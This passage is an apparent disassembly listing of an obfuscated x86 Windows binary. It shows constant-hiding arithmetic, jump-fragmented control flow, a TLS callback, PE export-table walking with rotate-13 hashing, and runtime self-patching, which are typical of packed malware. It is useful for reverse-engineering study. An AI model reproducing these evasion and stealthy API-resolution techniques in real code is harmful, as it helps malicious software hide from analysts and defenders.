loc_42F92A: ; DATA XREF: sub_43119E-142A�o
jz loc_42EDE2
mov eax, [ebp+8]
cmp dword ptr [eax-1Ch], 0F7h
jnz loc_42E997
jmp loc_432801
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4307FC
loc_42F945: ; CODE XREF: sub_4307FC:loc_42FCBA�j
mov eax, [eax+0Ch]
loc_42F948: ; CODE XREF: sub_4307FC:loc_431F9A�j
; sub_4307FC:loc_43283E�j
jb loc_431CA2
mov ebx, [eax+18h]
mov ecx, [ebx+3Ch]
mov ecx, [ebx+ecx+78h]
jmp loc_430245
; END OF FUNCTION CHUNK FOR sub_4307FC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E2A1
loc_42F95D: ; CODE XREF: sub_42E2A1:loc_43220E�j
mov ebp, esp
push ecx
cmp ds:dword_42E058, 0
jz loc_42E43A
mov eax, ds:dword_42E058
mov eax, [eax]
mov ds:dword_42E06C, eax
xor eax, eax
jmp loc_430823
; END OF FUNCTION CHUNK FOR sub_42E2A1
; ---------------------------------------------------------------------------
mov edi, 0A0F5C202h
jle loc_432375
jmp sub_431A9E
; ---------------------------------------------------------------------------
loc_42F990: ; CODE XREF: j8.b78ws:004315DF�j
not ecx
; =============== S U B R O U T I N E =======================================
sub_42F992 proc near ; CODE XREF: sub_4305D3+5�p
; FUNCTION CHUNK AT 0042E230 SIZE 0000001A BYTES
xchg esi, [esp+0]
pop esi
test al, al
jz nullsub_14
mov eax, 0BB8h
push edx
jmp loc_42E230
sub_42F992 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_431640
loc_42F9A9: ; CODE XREF: sub_431640:loc_431935�j
popf
xchg eax, [esp+4+var_4]
jmp sub_430E95
; END OF FUNCTION CHUNK FOR sub_431640
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43119E
loc_42F9B2: ; CODE XREF: sub_43119E:loc_42F79D�j
jz loc_430382
jmp loc_43067E
; END OF FUNCTION CHUNK FOR sub_43119E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_430C91
loc_42F9BD: ; CODE XREF: sub_430C91:loc_42FFBC�j
jz loc_4301A7
jmp loc_42F757
; END OF FUNCTION CHUNK FOR sub_430C91
; ---------------------------------------------------------------------------
mov [edx], edi
loc_42F9CA: ; CODE XREF: j8.b78ws:loc_432794�j
jmp sub_431E76
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_431E76
loc_42F9CF: ; CODE XREF: sub_431E76:loc_4303ED�j
mov ebp, esp
xchg ecx, eax
push eax
call sub_42EC7D
; END OF FUNCTION CHUNK FOR sub_431E76
; [00000005 BYTES: COLLAPSED FUNCTION j_nullsub_44. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E3FA
loc_42F9DE: ; CODE XREF: sub_42E3FA+27�j
jmp loc_43245D
; END OF FUNCTION CHUNK FOR sub_42E3FA
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_58. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
popf
jmp sub_43178D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E713
loc_42F9EA: ; CODE XREF: sub_42E713+B�j
or edx, 31027800h
add edx, 0C90F8685h
mov [edx], eax
pop edx
retn
; END OF FUNCTION CHUNK FOR sub_42E713
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4314D8
loc_42F9FA: ; CODE XREF: sub_4314D8-2E02�j
ror eax, 0Dh
jmp loc_431480
; END OF FUNCTION CHUNK FOR sub_4314D8
; =============== S U B R O U T I N E =======================================
sub_42FA02 proc near ; DATA XREF: sub_42EA96-12E�o
var_8 = dword ptr -8
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0043118E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004316CB SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00432843 SIZE 00000013 BYTES
add eax, [ebp-4]
xor edx, edx
push edx
push eax
loc_42FA09: ; CODE XREF: sub_42ECE1:loc_4310B7�j
mov eax, [ebp-18h]
add eax, eax
jmp loc_4316CB
sub_42FA02 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E825
loc_42FA13: ; CODE XREF: sub_42E825+6�j
call sub_430790
loc_42FA18: ; CODE XREF: sub_42E3FA+4E1�j
; sub_42E3FA+3FAD�j
cmp [ebp+var_1C], 67h
jnz loc_431683
mov eax, 6
sub eax, [ebp+var_4]
mov [ebp+var_4], eax
jmp loc_431683
; END OF FUNCTION CHUNK FOR sub_42E825
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42FA32 proc near ; CODE XREF: sub_42ED88+36FC�p
; sub_42ED88+379C�p
push ebp
mov ebp, esp
jmp sub_42E14A
sub_42FA32 endp
; ---------------------------------------------------------------------------
loc_42FA3A: ; CODE XREF: j8.b78ws:loc_430653�j
jnz loc_42F822
; START OF FUNCTION CHUNK FOR sub_42F893
loc_42FA40: ; CODE XREF: sub_42F893+4A4�j
jmp loc_42FC27
; END OF FUNCTION CHUNK FOR sub_42F893
; ---------------------------------------------------------------------------
loc_42FA45: ; CODE XREF: j8.b78ws:loc_430EA6�j
ror ecx, 16h
jmp loc_42F821
; ---------------------------------------------------------------------------
loc_42FA4D: ; CODE XREF: j8.b78ws:00432293�j
mov ds:dword_43008C, eax
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4314D8
loc_42FA54: ; CODE XREF: sub_4314D8-168�j
jmp loc_432298
; END OF FUNCTION CHUNK FOR sub_4314D8
; [00000005 BYTES: COLLAPSED FUNCTION j_nullsub_71. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_42FA5E: ; CODE XREF: j8.b78ws:0042E4EC�j
jmp loc_430FDE
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42FA63 proc near ; CODE XREF: sub_430D5F�j
; FUNCTION CHUNK AT 0042FEDF SIZE 0000000A BYTES
push ebp
mov ebp, esp
push ecx
mov esp, ebp
pop ebp
jmp loc_42FEDF
sub_42FA63 endp
; ---------------------------------------------------------------------------
mov ebp, edi
jmp loc_431400
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_430C91
loc_42FA76: ; CODE XREF: sub_430C91-F3B�j
jg loc_42FFBC
loc_42FA7C: ; CODE XREF: sub_430F88:loc_4318F2�j
push ecx
push 0FF7E5907h
pop ecx
add ecx, 0C4A7BAh
xchg ecx, [esp+0]
jmp sub_431338
; END OF FUNCTION CHUNK FOR sub_430C91
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4320AE
loc_42FA91: ; CODE XREF: sub_4320AE:loc_4309A7�j
jz loc_43039E
jmp loc_431D26
; END OF FUNCTION CHUNK FOR sub_4320AE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43119E
loc_42FA9C: ; CODE XREF: sub_43119E:loc_4310B2�j
jz loc_43263C
jmp loc_42E037
; END OF FUNCTION CHUNK FOR sub_43119E
; ---------------------------------------------------------------------------
loc_42FAA7: ; CODE XREF: j8.b78ws:loc_42EC4F�j
xchg edx, [esp]
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_430B64
loc_42FAAB: ; CODE XREF: sub_430B64+4�j
jmp loc_431254
; END OF FUNCTION CHUNK FOR sub_430B64
; ---------------------------------------------------------------------------
call edx
xor eax, eax
mov [ebp-4], eax
mov eax, [ebp-4]
jmp loc_4327B3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4302AC
loc_42FABF: ; CODE XREF: sub_4302AC+B�j
jnz loc_430BC3
call nullsub_2
call sub_432300
mov edx, 0CF0182F6h
call sub_430BB5
loc_42FAD9: ; CODE XREF: sub_43133D:loc_431F22�j
rol eax, 11h
push offset sub_42F8C0
jmp j_nullsub_34
; END OF FUNCTION CHUNK FOR sub_4302AC
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_7. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_42FAE7 proc near ; CODE XREF: sub_432342�j
; DATA XREF: sub_432328+5�o
; FUNCTION CHUNK AT 0042ED51 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 004312EE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004316EE SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00431DC1 SIZE 0000000F BYTES
mov [esp+0], ecx
mov esp, ebp
pop ebp
push 0D0C73F1Dh
pop eax
and eax, 24ED58EDh
jnz loc_42ED51
sub_42FAE7 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_430A75
loc_42FAFF: ; CODE XREF: sub_430A75:loc_4316FA�j
call sub_430734
loc_42FB04: ; DATA XREF: sub_42ED88+23CF�o
mov [ebp-8], eax
cmp dword ptr [ebp-8], 0
call sub_42EC6B
loc_42FB10: ; CODE XREF: j8.b78ws:004319AB�j
jmp loc_431013
; END OF FUNCTION CHUNK FOR sub_430A75
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_431CB2
loc_42FB15: ; CODE XREF: sub_431CB2-2E88�j
pop edx
xor edx, 5E02B2EBh
popf
xchg edx, [esp+0Ch+var_C]
jmp sub_431ED3
; END OF FUNCTION CHUNK FOR sub_431CB2
; ---------------------------------------------------------------------------
xchg ebp, esi
jmp sub_431AFE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_430053
loc_42FB2C: ; CODE XREF: sub_430053+1�j
mov ebp, esp
add esp, 0FFFFFFF4h
mov [ebp-4], eax
mov eax, [ebp-4]
mov [ebp-0Ch], eax
jmp loc_43124F
; END OF FUNCTION CHUNK FOR sub_430053
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_430C91
loc_42FB3F: ; CODE XREF: sub_430C91:loc_42FF42�j
xor ebx, edi
jmp loc_430BE8
; END OF FUNCTION CHUNK FOR sub_430C91
; ---------------------------------------------------------------------------
sbb ecx, 3698F2AFh
jmp sub_4314D8
; ---------------------------------------------------------------------------
add eax, 0BB8h
xchg eax, edx
push edx
xchg eax, edx
push ecx
push 79614309h
jmp loc_431E07
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_77. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43237F
loc_42FB67: ; CODE XREF: sub_43237F-FDC�j
push eax
cmp dword ptr [ebp-14h], 6
setz al
call sub_430E65
pop ecx
shl eax, 3
mov edx, [ebp+8]
jmp loc_432152
; END OF FUNCTION CHUNK FOR sub_43237F
; =============== S U B R O U T I N E =======================================
sub_42FB80 proc near ; CODE XREF: sub_4326C0�j
; DATA XREF: sub_4326B0+6�o
call nullsub_2
sub_42FB80 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_42FF6E
loc_42FB85: ; CODE XREF: sub_42FF6E+E�j
mov eax, [ebp-4]
call sub_42ED88
loc_42FB8D: ; CODE XREF: sub_431A9E+D�j
pop esi
push offset loc_4308F3
jmp locret_430910
; END OF FUNCTION CHUNK FOR sub_42FF6E
; =============== S U B R O U T I N E =======================================
sub_42FB98 proc near ; CODE XREF: sub_43119E+58�j
; sub_431BAC-B�p
; FUNCTION CHUNK AT 00430777 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00430D84 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00431139 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00431763 SIZE 00000010 BYTES
mov [esp+0], eax
pop eax
dec dword ptr [ebp-18h]
jnz loc_430777
jmp loc_431139
sub_42FB98 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EA28
loc_42FBAA: ; CODE XREF: sub_42EA28�j
add eax, 28h
push edx
jmp loc_4321D7
; END OF FUNCTION CHUNK FOR sub_42EA28
; ---------------------------------------------------------------------------
loc_42FBB3: ; DATA XREF: sub_42E24A+7�o
mov [ebp-1Ch], eax
lea eax, [ebp-125h]
mov [ebp-20h], eax
; START OF FUNCTION CHUNK FOR sub_42E174
loc_42FBBF: ; CODE XREF: sub_42E174+3A8D�j
mov eax, [ebp-1Ch]
push offset sub_42F886
jmp nullsub_86
; END OF FUNCTION CHUNK FOR sub_42E174
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_84. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
locret_42FBCD: ; CODE XREF: j8.b78ws:loc_430084�j
retn
; ---------------------------------------------------------------------------
loc_42FBCE: ; CODE XREF: j8.b78ws:00430FE4�j
jmp loc_431EF0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E32F
loc_42FBD3: ; CODE XREF: sub_42E32F+12�j
; sub_4309F3-1CC9�j ...
mov al, 1
jmp loc_42E11E
; END OF FUNCTION CHUNK FOR sub_42E32F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E14A
loc_42FBDA: ; CODE XREF: sub_42E14A:loc_42E164�j
; sub_4322A3+4�j
inc dword ptr [ebp-4]
jmp loc_42EB6D
; END OF FUNCTION CHUNK FOR sub_42E14A
; =============== S U B R O U T I N E =======================================
sub_42FBE2 proc near ; CODE XREF: sub_42ED88+4�p
arg_8 = dword ptr 0Ch
; FUNCTION CHUNK AT 0042E461 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0042E4F6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043093F SIZE 00000003 BYTES
call sub_43094F
push ecx
jmp loc_42E461
sub_42FBE2 endp
; ---------------------------------------------------------------------------
db 0Fh, 85h, 3Ch
dd 0E9FFFFEAh, 251Ah
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43119E
loc_42FBF8: ; CODE XREF: sub_43119E:loc_4311CE�j
push 0ED018710h
pop esi
rol esi, 6
add esi, 9DB64AC0h
add esi, ebp
push offset loc_42EBFD
jmp nullsub_79
; END OF FUNCTION CHUNK FOR sub_43119E
; =============== S U B R O U T I N E =======================================
sub_42FC13 proc near ; DATA XREF: sub_43119E+149F�o
push 66BDB9AFh
pop ecx
add ecx, 998565FBh
xchg ecx, [esp+0]
jmp sub_4300E2
sub_42FC13 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F893
loc_42FC27: ; CODE XREF: sub_42F893:loc_42FA40�j
push offset sub_430BA0
jmp j_nullsub_80
; END OF FUNCTION CHUNK FOR sub_42F893
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42FED3
loc_42FC31: ; CODE XREF: sub_42FED3+7�j
mov [ebp-4], eax
push 0C5384DF8h
pop eax
rol eax, 1Ah
add eax, 511255DAh
add eax, ebp
add eax, 0CBD8C8DFh
jmp loc_430A38
; END OF FUNCTION CHUNK FOR sub_42FED3
; ---------------------------------------------------------------------------
add esi, 0C3972516h
jmp sub_4316B9
; ---------------------------------------------------------------------------
adc esi, ebp
jmp sub_431711
; ---------------------------------------------------------------------------
jnp loc_430A81
test esi, 8F5CD228h
jmp loc_42E106
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4306C9
loc_42FC73: ; CODE XREF: sub_4306C9:loc_431326�j
lea eax, [ebp+var_125]
push eax
call sub_42E2A1
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jmp loc_432747
; END OF FUNCTION CHUNK FOR sub_4306C9
; =============== S U B R O U T I N E =======================================
sub_42FC8B proc near ; CODE XREF: sub_4305D3�p
; FUNCTION CHUNK AT 0042F90E SIZE 0000000E BYTES
; FUNCTION CHUNK AT 004305C4 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0043070B SIZE 0000000B BYTES
mov eax, ds:dword_43129C
or eax, eax
jnz loc_4305C4
jmp loc_43070B
sub_42FC8B endp
; ---------------------------------------------------------------------------
loc_42FC9E: ; CODE XREF: j8.b78ws:loc_4300A8�j
mov ecx, 8
sub ecx, eax
xor eax, eax
mov al, [ebp-9]
jmp loc_42EB72
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_87. PRESS KEYPAD "+" TO EXPAND]
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_73. PRESS KEYPAD "+" TO EXPAND]
; [00000005 BYTES: COLLAPSED FUNCTION j_nullsub_21. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43119E
loc_42FCB6: ; CODE XREF: sub_43119E:loc_4311C8�j
pop ecx
pop ecx
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_43119E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4307FC
loc_42FCBA: ; CODE XREF: sub_4307FC+C�j
jmp loc_42F945
; END OF FUNCTION CHUNK FOR sub_4307FC
; =============== S U B R O U T I N E =======================================
sub_42FCBF proc near ; CODE XREF: j8.b78ws:00431743�j
; sub_432806-28�p
; FUNCTION CHUNK AT 0042E898 SIZE 0000000E BYTES
mov [esp+0], edx
pop edx
loc_42FCC3: ; CODE XREF: j8.b78ws:0043224A�j
push 0
call sub_42E8A6
pop eax
jmp loc_42E898
sub_42FCBF endp ; sp-analysis failed
; ---------------------------------------------------------------------------
xchg edi, [edx]
ror ecx, 0Ch
jmp sub_431F41
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_431F6D
loc_42FCDA: ; CODE XREF: sub_431F6D:loc_432310�j
mov ecx, eax
or ebp, 682028A5h
mov ebx, eax
test eax, ebx
jmp loc_430234
; END OF FUNCTION CHUNK FOR sub_431F6D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4315A4
loc_42FCEB: ; CODE XREF: sub_4315A4+18�j
mov edx, [ebx+3Ch]
mov edx, [ebx+edx+80h]
or edx, edx
jz loc_430B22
loc_42FCFD: ; CODE XREF: sub_42EC9C+9�j
; sub_4315A4-1744�j
jo loc_432266
add edx, 14h
mov ecx, [ebx+edx-8]
or ecx, ecx
jmp loc_4319FE
; END OF FUNCTION CHUNK FOR sub_4315A4
; =============== S U B R O U T I N E =======================================
sub_42FD11 proc near ; CODE XREF: j8.b78ws:0042EB4A�j
; j8.b78ws:00431B4E�p
xchg edx, [esp+0]
pop edx
add edx, 87FBBFDBh
call sub_432702
push offset sub_431A2C
jmp loc_43236A
sub_42FD11 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F893
loc_42FD2A: ; CODE XREF: sub_42F893:loc_42F899�j
pop ebp
push 31B17455h
pop eax
add eax, 0CE91B0ABh
jmp loc_42FA40
; END OF FUNCTION CHUNK FOR sub_42F893
; ---------------------------------------------------------------------------
loc_42FD3C: ; CODE XREF: j8.b78ws:loc_4327B3�j
mov ecx, offset loc_42FD45
xchg ecx, [esp]
retn
; ---------------------------------------------------------------------------
loc_42FD45: ; DATA XREF: j8.b78ws:loc_42FD3C�o
pop ebp
retn 4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_430C91
loc_42FD49: ; CODE XREF: sub_42FDD9+7�j
call sub_431403
loc_42FD4E: ; CODE XREF: sub_430F88+565�j
pop ebp
xchg ebx, [eax]
rol eax, 0Ah
test edi, eax
jmp loc_42FA76
; END OF FUNCTION CHUNK FOR sub_430C91
; ---------------------------------------------------------------------------
loc_42FD5B: ; CODE XREF: j8.b78ws:00430B03�j
mov ds:dword_432504, eax
push offset sub_42E8EF
jmp loc_42F89F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43119E
loc_42FD6A: ; CODE XREF: sub_43119E-243�j
mov eax, [ebp+8]
cmp dword ptr [eax-1Ch], 0F6h
push offset loc_42F92A
jmp j_nullsub_48
; END OF FUNCTION CHUNK FOR sub_43119E
; ---------------------------------------------------------------------------
sbb ecx, 6A48BD31h
mov ebp, 324C7EA8h
jmp sub_42EC9C
; ---------------------------------------------------------------------------
mov ebp, 64BEF91Fh
jbe loc_430853
jmp sub_42EA18
; ---------------------------------------------------------------------------
jno loc_4309E2
xor ebx, 1C518C55h
jmp sub_42ED88
; =============== S U B R O U T I N E =======================================
sub_42FDAF proc near ; CODE XREF: sub_43119E+130�j
; sub_42EC54+3804�p
; FUNCTION CHUNK AT 0042E830 SIZE 00000027 BYTES
mov [esp+0], ebx
pop ebx
xor eax, eax
mov [ebp-0Ch], eax
cmp dword ptr [ebp-4], 0
jz loc_432006
mov eax, [ebp-4]
jmp loc_42E830
sub_42FDAF endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR TlsCallback_0
loc_42FDCA: ; CODE XREF: TlsCallback_0:loc_4324D8�j
call sub_43050F
; END OF FUNCTION CHUNK FOR TlsCallback_0
; START OF FUNCTION CHUNK FOR sub_430323
loc_42FDCF: ; CODE XREF: sub_430323+15�j
jmp loc_431DE9
; END OF FUNCTION CHUNK FOR sub_430323
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_430C91
loc_42FDD4: ; CODE XREF: sub_430C91+14�j
call sub_42EAFC
; END OF FUNCTION CHUNK FOR sub_430C91
; =============== S U B R O U T I N E =======================================
sub_42FDD9 proc near ; CODE XREF: sub_42E699+1C56�p
; j8.b78ws:00430FAE�j
arg_0 = dword ptr 4
mov [esp+0], eax
pop eax
xchg eax, [esp-4+arg_0]
jmp loc_42FD49
sub_42FDD9 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_430273
loc_42FDE5: ; CODE XREF: sub_430273:loc_42E523�j
push eax
push edx
push 202153DAh
pop edx
sub edx, 72D901FDh
jmp loc_4316DE
; END OF FUNCTION CHUNK FOR sub_430273
; ---------------------------------------------------------------------------
xor [esp], eax
push eax
push offset sub_4319CA
jmp locret_4307C4
; ---------------------------------------------------------------------------
loc_42FE06: ; CODE XREF: j8.b78ws:loc_430FDE�j
; j8.b78ws:00431EF9�j
push dword ptr [ebp+10h]
push eax
push 171C20Fh
pop eax
xor eax, 63FF7CDDh
jmp loc_431FBF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4319CA
loc_42FE1B: ; CODE XREF: sub_4319CA+F�j
jb loc_42F8AA
; END OF FUNCTION CHUNK FOR sub_4319CA
; START OF FUNCTION CHUNK FOR sub_43119E
loc_42FE21: ; CODE XREF: sub_43119E-21B�j
jmp loc_4314BA
; END OF FUNCTION CHUNK FOR sub_43119E
; ---------------------------------------------------------------------------
not eax
jg loc_430065
loc_42FE2E: ; CODE XREF: j8.b78ws:0042EC34�j
jmp loc_42E5FA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4307FC
loc_42FE33: ; CODE XREF: sub_4307FC-9BB�j
; sub_4307FC-9B2�j ...
xor ebx, ebx
loc_42FE35: ; CODE XREF: sub_430A75+5AB�j
push offset sub_42FE87
jmp nullsub_28
; ---------------------------------------------------------------------------
loc_42FE3F: ; CODE XREF: sub_4307FC+830�j
or eax, eax
jz loc_42FE33
cmp eax, 0FFFFFFFFh
jz loc_42FE33
jmp loc_432824
; END OF FUNCTION CHUNK FOR sub_4307FC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4315A4
loc_42FE55: ; CODE XREF: sub_4315A4:loc_4319FE�j
jz loc_430B22
call sub_42EAEB
jnz loc_42FCFD
mov ecx, [ebx+edx-4]
or ecx, ecx
jz loc_430B22
mov ebx, [ebx+ecx]
jmp loc_4304EB
; END OF FUNCTION CHUNK FOR sub_4315A4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43119E
loc_42FE7A: ; CODE XREF: sub_43119E:loc_43009C�j
; j8.b78ws:0043279A�j
mov [esp+0], eax
call sub_431A9E
; END OF FUNCTION CHUNK FOR sub_43119E
; START OF FUNCTION CHUNK FOR sub_42EC7D
loc_42FE82: ; CODE XREF: sub_42EC7D+8�j
jmp loc_4320A5
; END OF FUNCTION CHUNK FOR sub_42EC7D
; =============== S U B R O U T I N E =======================================
sub_42FE87 proc near ; DATA XREF: sub_4307FC:loc_42FE35�o
mov eax, ebx
pop ecx
call sub_43236F
loc_42FE8F: ; CODE XREF: sub_432702-671�j
jmp sub_42EB59
sub_42FE87 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_42FE94 proc near ; DATA XREF: sub_431845+2�o
mov [ebp-8], eax
jmp loc_430CDC
sub_42FE94 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F832
loc_42FE9C: ; CODE XREF: sub_42F832+8�j
test byte ptr [ebp-8], 8
jz loc_431AF3
push offset sub_42E487
jmp nullsub_15
; END OF FUNCTION CHUNK FOR sub_42F832
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_65. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42ED88
loc_42FEB1: ; CODE XREF: sub_42ED88+B33�j
jmp loc_42EBCD
; END OF FUNCTION CHUNK FOR sub_42ED88
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E12B
loc_42FEB6: ; CODE XREF: sub_42E12B+F�j
inc ds:dword_43129C
lea eax, nullsub_1
mov byte ptr [eax], 0C3h
push ecx
push 663091E1h
pop ecx
jmp loc_4321F7
; END OF FUNCTION CHUNK FOR sub_42E12B
; ---------------------------------------------------------------------------
loc_42FED1: ; CODE XREF: j8.b78ws:0042EAC9�j
sbb eax, ebx
; =============== S U B R O U T I N E =======================================
sub_42FED3 proc near ; CODE XREF: sub_42E9DA:loc_43019D�p
; FUNCTION CHUNK AT 0042FC31 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 0043076D SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00430A38 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0043270A SIZE 0000000B BYTES
mov [esp+0], ebx
pop ebx
add eax, 18h
jmp loc_42FC31
sub_42FED3 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42FA63
loc_42FEDF: ; CODE XREF: sub_42FA63+7�j
push offset loc_4318D5
jmp j_nullsub_25
; END OF FUNCTION CHUNK FOR sub_42FA63
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_430C2C
loc_42FEE9: ; CODE XREF: sub_430C2C:loc_430911�j
cmp byte ptr [eax], 0
jnz loc_4301C9
loc_42FEF2: ; CODE XREF: sub_4314D8-14A6�j
mov eax, [ebp-8]
mov byte ptr [eax], 0
call sub_431D62
loc_42FEFD: ; CODE XREF: sub_42E3FA+3FA4�j
jmp loc_431683
; END OF FUNCTION CHUNK FOR sub_430C2C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_431042
loc_42FF02: ; CODE XREF: sub_431042+6�j
jmp loc_42E35F
; END OF FUNCTION CHUNK FOR sub_431042
; ---------------------------------------------------------------------------
locret_42FF07: ; CODE XREF: j8.b78ws:loc_42E051�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4327C0
loc_42FF08: ; CODE XREF: sub_4327C0+3�j
jmp loc_42E47D
; END OF FUNCTION CHUNK FOR sub_4327C0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_430790
loc_42FF0D: ; CODE XREF: sub_430790+19EA�j
pop ebp
retn
; ---------------------------------------------------------------------------
loc_42FF0F: ; CODE XREF: sub_430790+19DC�j
mov eax, [ebp+8]
cmp dword ptr [eax-0Ch], 4
jnz loc_430CAA
add dword ptr [ebp-8], 4
jmp loc_432175
; END OF FUNCTION CHUNK FOR sub_430790
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_69. PRESS KEYPAD "+" TO EXPAND]
; [00000005 BYTES: COLLAPSED FUNCTION j_nullsub_69. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_42FF2B: ; DATA XREF: sub_4314D8-4CF�o
push eax
push 2ACF225Ah
pop eax
push offset sub_432402
jmp loc_42E7F7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_430C91
loc_42FF3C: ; CODE XREF: sub_430C91-5CD�j
jz loc_430BEA
loc_42FF42: ; CODE XREF: sub_42E9AD:loc_430190�j
jmp loc_42FB3F
; END OF FUNCTION CHUNK FOR sub_430C91
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_81. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
locret_42FF48: ; CODE XREF: j8.b78ws:0043026E�j
retn
; ---------------------------------------------------------------------------
mov ecx, [edx]
jmp sub_431D62
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_95. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_430BA0
loc_42FF51: ; CODE XREF: sub_430BA0:loc_432411�j
popf
add eax, 1168B585h
cmp ebp, 0AD62BF5Dh
jmp loc_42F91C
; END OF FUNCTION CHUNK FOR sub_430BA0
; ---------------------------------------------------------------------------
sbb edi, 15CF2913h
jmp loc_4301D8
; =============== S U B R O U T I N E =======================================
sub_42FF6E proc near ; CODE XREF: j8.b78ws:00430AD8�j
; sub_42EC6B+2A9C�p
arg_4 = dword ptr 8
; FUNCTION CHUNK AT 0042FB85 SIZE 00000013 BYTES
xchg esi, [esp+0]
pop esi
adc edx, [esp-4+arg_4]
add esp, 8
mov [ebp-4], eax
jmp loc_42FB85
sub_42FF6E endp ; sp-analysis failed
